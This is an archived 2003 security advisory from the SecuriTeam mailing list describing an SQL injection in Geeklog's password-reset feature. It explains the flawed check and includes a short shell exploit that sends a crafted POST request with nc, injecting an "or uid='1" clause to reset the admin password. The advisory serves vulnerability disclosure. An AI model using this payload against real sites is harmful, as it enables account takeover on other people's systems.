[EXPL] Geeklog SQL Injection Exploit Code
From: SecuriTeam (support_at_securiteam.com)
Date: 10/19/03
- Previous message: SecuriTeam: "[NEWS] PeopleSoft Control-J Information Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 19 Oct 2003 19:22:14 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Geeklog SQL Injection Exploit Code
------------------------------------------------------------------------
SUMMARY
Following is an example of how MySQL SQL injections can be exploited and
how suppressing error messages is not sufficient as a solution. The
example application in this case is <http://www.geeklog.net/> Geeklog, a
'blog' (otherwise known as a Weblog).
DETAILS
Vulnerable systems:
* Geeklog version 1.3.8-1sr1 down to 1.3.8
Immune systems:
* Geeklog version 1.3.8-1sr2
The below exploit uses the "forgot password" feature introduced in Geeklog
1.3.8. By constructing a certain kind of HTTP request, an attacker can
change any user's Geeklog password, including the administrator password.
This is because an SQL injection problem. In users.php we have this kind
of code (line about 750):
if (!empty($uid) && is_numeric($uid) && !empty($reqid)) {
$valid = DB_count($_TABLES['users'], arrary('uid', 'pwrequestid'),
array($uid, $reqid));
if ($valid==1) {
// generate an md5 hash for the new password and change it
} else {
// invalid request, display error message
}
}
The database module layer hides the actual SQL queries and this does not
look very clear yet, but if we log all SQL queries executed, we see that
the above code produces this SQL (with e.g. $uid=2 and $reqid=3):
SELECT COUNT(*) FROM gl_users WHERE uid = '2' AND pwrequestid = '3'
The password is changed only if the count returned by this query is
exactly one. The only check done for $reqid is that it is not empty. It
can contain anything, so changing $reqid to e.g. "3' or uid='1" the SQL
server will get this query instead:
SELECT COUNT(*) FROM gl_users
WHERE uid = '2' AND pwrequestid = '3' or uid='1'
The pwrequestid = '3' condition is false unless the admin user really
forgot the password and uses this feature at the same time (very
unlikely). However, because of the "or uid='1'" part, the query will still
return one, because a user with uid=1 exists (the Anonymous user). So, the
$valid variable in the above code is set to one and the password is
changed.
This of course has nothing to do with displaying error messages. The
exploit does not produce any error message because the SQL code above is
correct.
Jouko has informed Geeklog developers about this and they have released a
fixed version, see <http://www.geeklog.net> http://www.geeklog.net.
Exploit:
#!/bin/sh
echo "POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded
mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&" | nc localhost 80
This should change the Admin user's password to "new". You have to change
the /path/to/gl/users.php according to your Geeklog installation.
ADDITIONAL INFORMATION
The information has been provided by <mailto:jouko@iki.fi> Jouko
Pynnonen.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] PeopleSoft Control-J Information Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [REVS] Lateral SQL Injection: a New Class of Vulnerability in Oracle
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Lateral SQL Injection:
a New Class of Vulnerability in Oracle ... How can an attacker exploit a PL/SQL procedure
that doesn't even take user ... is then dynamically executed via the EXECUTE IMMEDIATE statement.
... (Securiteam) - [UNIX] Multiple Vulnerabilities MetaDot Portal Server
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... SQL Injection: ...
query he can cause an error message to execute script into an unsuspecting ... users browser
thus causing a Cross Site Scripting attack. ... (Securiteam) - [UNIX] Joomla BSQ Sitestats Component Multiple Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Secunia Research has discovered
some vulnerabilities in the BSQ ... SQL query. ... Successful exploitation
requires that "register_globals" is enabled. ... (Securiteam) - [UNIX] dev4u CMS Multiple SQL Injection and Cross Site Scripting Issues
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... dev4u CMS Multiple SQL
Injection and Cross Site Scripting Issues ... arbitrary SQL statements as well as include
arbitrary HTML and/or ... (Securiteam) - [UNIX] WordPress Cafelog SQL Injection Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... WordPress Cafelog has been found
to contain an SQL Injection vulnerability ... (Securiteam)
